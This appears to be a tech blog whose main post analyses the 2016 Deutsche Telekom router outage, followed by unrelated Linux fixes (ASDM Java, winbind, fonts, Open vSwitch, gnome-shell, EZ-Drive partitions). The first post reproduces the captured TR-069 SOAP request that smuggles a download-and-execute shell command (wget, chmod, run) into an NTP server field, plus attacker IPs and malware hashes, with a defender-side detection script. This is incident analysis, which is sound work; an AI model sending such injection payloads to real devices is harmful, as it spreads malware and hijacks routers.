Today's Telekom problems

[Update]
This is a pretty nice description and summary: https://isc.sans.edu/forums/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759

The malware seems to be a descendant of the Mirai Linux worm
https://www.virustotal.com/en/file/7e84a8a74e93e567a6e7f781ab5764fe3bbc12c868b89e5c5c79924d5d5742e2/analysis/

which is described here
https://en.wikipedia.org/wiki/Mirai_(malware)
or here
https://www.incapsula.com/blog/malware-analysis-mirai-ddos-botnet.html

[/Update]

Many German Deutsche Telekom customers had connectivity problems tonight. Some people claimed that they could use their network again after changing the DNS server on their hosts. Most people got their boxes working again (for some time) after a reboot. Telekom communicated a lot of misleading and conflicting information. Events are summarized here:

https://www.heise.de/newsticker/meldung/Grossstoerung-im-Telekom-Netz-3505820.html

I found some interesting facts here
https://www.heise.de/forum/Netze/News-Kommentare/Grossstoerung-im-Telekom-Netz/Re-15-08-2014-Millionen-DSL-Router-durch-TR-069-Fernwartung-kompromittierbar/posting-29559291/show/

From everything I saw, it seems that some attacker sends a TR-069 XML command like

<?xml version="1.0"?>
<SOAP-ENV:Envelope
    xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
    SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <SOAP-ENV:Body>
    <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
      <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/1;chmod 777 1;./1`</NewNTPServer1>
      <NewNTPServer2/>
      <NewNTPServer3/>
      <NewNTPServer4/>
      <NewNTPServer5/>
    </u:SetNTPServers>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

I am still trying to find out whether this comes from inside the Telekom network or from the outside. The number of access requests has been declining since tonight:
https://www.heise.de/forum/Netze/News-Kommentare/Grossstoerung-im-Telekom-Netz/TR-069/posting-29558928/show/

It seems that Telekom now blocks Port 7547 tcp from the outside.

The URL seems to differ a bit. The server has IP 212.92.127.146 at the moment. People say it used to be 188.209.49.168.
(https://www.heise.de/forum/Netze/News-Kommentare/Grossstoerung-im-Telekom-Netz-dauert-an/Re-port-7547-scans-auf-Digitalisierungsbox/posting-29559739/show/).

Anyway, obviously this tries to inject shell commands via a bug first discovered here:
https://devicereversing.wordpress.com/2016/11/07/eirs-d1000-modem-is-wide-open-to-being-hacked/

First of all this changes the DNS server to some bullshit, which explains the DNS problems… Second, it loads a MIPS binary (SHA1: 60b0b1631b1c7112b34f6850f60fc62e95174428) into the ramdisk in /tmp and executes it. If the binary does not inject something permanently, the show will be over after a reboot. So this phenomenon is explained as well.

But now, what does the binary do? I just looked at the strings output, and one thing it does is disable the TR-069 port via

iptables -A INPUT -p tcp --destination-port 7547 -j DROP

and send some status information to a (for me) still unknown receiver:

POST /
HTTP/1.1
Myname--is:
Host:
Cookie:
http
url=

There is at least a second version of the binary (SHA1: feb6531b4509015a3a119f67b290175b284e9864) that additionally disables a locally running telnet daemon and seems to replicate itself via two different URLs:

POST /UD/act?1 HTTP/1.1
Host: 127.0.0.1:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 526

<?xml version="1.0"?><SOAP-ENV:Envelope
    xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
    SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <SOAP-ENV:Body>
    <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
      <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/1;chmod 777 1;./1`</NewNTPServer1>
      <NewNTPServer2></NewNTPServer2>
      <NewNTPServer3></NewNTPServer3>
      <NewNTPServer4></NewNTPServer4>
      <NewNTPServer5></NewNTPServer5>
    </u:SetNTPServers>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

POST /UD/act?1 HTTP/1.1
Host: 127.0.0.1:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 526

<?xml version="1.0"?><SOAP-ENV:Envelope
    xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
    SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <SOAP-ENV:Body>
    <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
      <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2`</NewNTPServer1>
      <NewNTPServer2></NewNTPServer2>
      <NewNTPServer3></NewNTPServer3>
      <NewNTPServer4></NewNTPServer4>
      <NewNTPServer5></NewNTPServer5>
    </u:SetNTPServers>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
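As an added defender-side check (my code, not from this post or any of the linked sources): a small inspector that splits a captured request of the shape above, finds the SetNTPServers action in the SOAP body and flags any NewNTPServer value that cannot be a hostname or IP address. The two sample requests are constructed; the download host in the injected one is a placeholder.

```python
import re
import xml.etree.ElementTree as ET

SETNTP = ".//{urn:dslforum-org:service:Time:1}SetNTPServers"
# A legitimate NTP server field holds a hostname or IP; backticks, ';', '$(' and blanks do not fit.
HOSTNAME = re.compile(r"^[A-Za-z0-9.:-]{1,253}$")

def split_request(raw: bytes):
    """Return (request line, body) of a raw HTTP/1.1 request."""
    head, _, body = raw.partition(b"\r\n\r\n")
    return head.decode("latin-1").split("\r\n")[0], body

def inspect_request(raw: bytes):
    """Findings for one SOAP request to the port-7547 interface; [] means clean."""
    req_line, body = split_request(raw)
    if not req_line.startswith("POST /UD/act"):
        return []
    try:
        root = ET.fromstring(body)
    except ET.ParseError as exc:
        return [f"unparseable SOAP body: {exc}"]
    action = root.find(SETNTP)
    if action is None:          # only SetNTPServers carries the injectable fields
        return []
    findings = []
    for field in action:        # NewNTPServer1 .. NewNTPServer5
        value = (field.text or "").strip()
        if value and not HOSTNAME.match(value):
            findings.append(f"{field.tag}: not a hostname, looks like injection: {value!r}")
    return findings

def soap_request(ntp1: str) -> bytes:
    """Constructed request in the shape shown above (download host is a placeholder)."""
    body = ('<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV='
            '"http://schemas.xmlsoap.org/soap/envelope/"><SOAP-ENV:Body>'
            '<u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">'
            f"<NewNTPServer1>{ntp1}</NewNTPServer1><NewNTPServer2></NewNTPServer2>"
            "</u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>")
    head = ("POST /UD/act?1 HTTP/1.1\r\nHost: 127.0.0.1:7547\r\n"
            "SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers\r\n"
            f"Content-Type: text/xml\r\nContent-Length: {len(body)}\r\n\r\n")
    return (head + body).encode()

INJECTED = soap_request("`cd /tmp;wget http://dropper.invalid/1;chmod 777 1;./1`")
BENIGN = soap_request("ptbtime1.ptb.de")

if __name__ == "__main__":
    for name, req in (("injected", INJECTED), ("benign", BENIGN)):
        print(name, inspect_request(req) or "clean")
```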

In one forum it was said that Telekom tries to use the same bug to inject an iptables command that closes the TR-069 port, hoping to be faster than the attackers. I'm still trying to get confirmation about this :).

https://www.heise.de/forum/Netze/News-Kommentare/Grossstoerung-im-Telekom-Netz/Misfortune-Cookie-neuaufgelegt/posting-29560638/show/


Cisco ASA ASDM in Linux — oracle JRE only

Before anyone else stares at

java.lang.NoSuchMethodError:
sun.security.x509.NetscapeCertTypeExtension.get

or

java.lang.NumberFormatException: For input string: "72-internal" 

and wonders why the ASDM won't work with Debian GNU/Linux: for some reason it's just not compatible with OpenJDK. Install oracle-jdk as explained on https://wiki.debian.org/JavaPackage and make pretty sure that your package stays up to date.

After installing it, I still had to change the JVM in itweb-settings to

/usr/lib/jvm/jdk-8-oracle-x64/jre

Shiny enterprise world.

Ubuntu 14.04, Freeradius and ntlm_auth

Beware: after updating Ubuntu to 14.04 you should fix your samba/winbindd config, as it has a major error that prevents freeradius from using ntlm_auth. You have to change /etc/init/winbind.conf to

description "Samba Winbind"
author "David Weber"

start on (local-filesystems and net-device-up IFACE!=lo)
stop on runlevel [!2345]

respawn

pre-start script
    test -x /usr/sbin/winbindd || exit 0
    mkdir -p /var/lib/samba/winbindd_privileged
    chgrp winbindd_priv /var/lib/samba/winbindd_privileged
    chmod 0750 /var/lib/samba/winbindd_privileged
end script

script
    [ -r /etc/default/winbind ] && . /etc/default/winbind
    exec /usr/sbin/winbindd -F $WINBINDD_OPTS
end script

and make horribly sure that it won't be overwritten by the next update, as they don't seem to be interested in fixing it…

cf. https://bugs.launchpad.net/ubuntu/+source/samba/+bug/1330220

[Update]
Debian seems to have the same problem:
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=754339

Fix the font rendering of Calibri

If you see very bad artifacts when displaying small sizes of the Calibri font in Linux (which you are not allowed to use because it comes with an MS Windows-only license), you should disable its embedded bitmap variants in $HOME/.fonts.conf:

<?xml version="1.0"?>
<!DOCTYPE fontconfig SYSTEM "fonts.dtd">
<fontconfig>
  <match target="font">
    <edit name="embeddedbitmap" mode="assign">
      <bool>false</bool>
    </edit>
  </match>
</fontconfig>

2ct and a cookie if someone sends me the snippet to only apply this to the Calibri font :-).

Thanks to
http://linuxg.net/fix-the-microsoft-font-rendering-under-libreoffice/ for the hint!

Linux Bridge vs Open vSwitch

As a short follow-up to
https://mohskitchen.wordpress.com/2014/04/26/first-steps-with-open-vswitch/

justindpettit wrote a nice blog post about recent performance improvements in OVS:

http://networkheresy.com/2014/11/13/accelerating-open-vswitch-to-ludicrous-speed/

What does this mean for a simple KVM/OpenStack setup? For me it shows that the Linux bridge is still superior when only doing Layer 2 forwarding. OVS might be as fast, but it takes a whole lot more CPU power, which is taken away from your VMs. And it seems to be even worse for old versions of OVS in LTS distributions.

gnome-shell full screen windows and click-through problems

I lately bought a Thinkpad Yoga and started using gnome3/gnome-shell because of its nice tablet features. I really have to admit that people were visionary and implemented all this bullshit that only hinders you while working with mouse and keyboard. Good work with this, although I really miss the simple aesthetics of my former XFCE desktop with the BeOS-like window borders, overall less clutter and especially superswitcher.

Anyway, now I'm on gnome-shell and had this really annoying bug where you always click "through" full screen windows (like Kodi, mplayer, virt-manager, HTML5 videos etc.). Say you just opened Kodi, put it into full screen and want to do a right click; the next thing you see is the context menu of your desktop. Yeah.

Long story short. I switched my mutter window ‘Focus Mode’ from “Mouse” to “Sloppy” using gnome-tweak-tool, section “Windows”. The focus still follows the mouse but clicks into full screen windows stay where they belong.

Mounting a hard disk with an EZ-Drive partition

Today I stumbled upon a drive with a partition table like

Disk /dev/sdb: 74.5 GiB, 80026361856 bytes, 156301488 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x213f213e

Device     Boot Start      End  Sectors Size Id Type
/dev/sdb1  *        9 16434494 16434486 7.9G 55 EZ-Drive

Thanks to Google I found this manual

http://fatooh.org/misc/ez-drive.html

with the quintessence being

dd if=/dev/sdb bs=1 skip=958 count=66 of=/dev/sdb seek=446

Afterwards you see the 'real' partition table.

Hint: it seems that the Linux kernel once noticed DOS/Windows drive mappers itself and did the remapping for us. This was removed somewhere in the early 2.6 series. Some HowTos say the kernel parameter sdb=remap is supposed to re-enable this, but it didn't work for me.
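As an added illustration (my code, not from this post or the linked manual): the same 66-byte move the dd command does, performed on an in-memory copy of the first two sectors and only after checking the 0x55AA signatures and the EZ-Drive type byte, so it can be tried on a dd image of the drive rather than on the device itself. The hidden table values in the sample image are constructed.

```python
import struct

MBR_TABLE = 446        # where the BIOS and the kernel expect the 4 x 16-byte partition table
EZ_TABLE = 958         # where EZ-Drive parks the real table: sector 1, same offset (512 + 446)
TABLE_LEN = 66         # 64 bytes of entries plus the 2-byte 0x55AA signature
EZ_DRIVE_TYPE = 0x55   # the Id fdisk printed above

def partitions(sector: bytes) -> list:
    """Decode the four partition entries at offset 446 of one 512-byte sector."""
    table = []
    for i in range(4):
        entry = sector[MBR_TABLE + 16 * i:MBR_TABLE + 16 * i + 16]
        start, size = struct.unpack_from("<II", entry, 8)
        table.append({"boot": entry[0] == 0x80, "type": entry[4],
                      "start": start, "size": size})
    return table

def remap_ez_drive(image: bytearray) -> list:
    """Do what the dd command above does, on an in-memory image and only after
    checking that there really is an EZ-Drive table to move."""
    if image[510:512] != b"\x55\xaa":
        raise ValueError("sector 0 carries no MBR signature")
    if partitions(image[:512])[0]["type"] != EZ_DRIVE_TYPE:
        raise ValueError("first partition is not EZ-Drive (Id 55); nothing to remap")
    hidden = bytes(image[EZ_TABLE:EZ_TABLE + TABLE_LEN])
    if hidden[64:66] != b"\x55\xaa":
        raise ValueError("no partition table signature at offset 958")
    image[MBR_TABLE:MBR_TABLE + TABLE_LEN] = hidden   # the same bytes dd copies
    return partitions(image[:512])

def make_entry(boot: int, ptype: int, start: int, size: int) -> bytes:
    """Build one 16-byte entry (CHS fields left zero in this constructed sample)."""
    return bytes([boot, 0, 0, 0, ptype, 0, 0, 0]) + struct.pack("<II", start, size)

def constructed_image() -> bytearray:
    """Two sectors imitating the drive above; the hidden table is made up."""
    img = bytearray(1024)
    img[446:462] = make_entry(0x80, EZ_DRIVE_TYPE, 9, 16434486)   # what fdisk showed
    img[510:512] = b"\x55\xaa"
    img[958:974] = make_entry(0x80, 0x83, 63, 156301425)          # the 'real' table
    img[1022:1024] = b"\x55\xaa"
    return img

if __name__ == "__main__":
    img = constructed_image()
    for p in remap_ez_drive(img):
        if p["type"]:
            print(f"type 0x{p['type']:02x} start {p['start']} sectors {p['size']}")
```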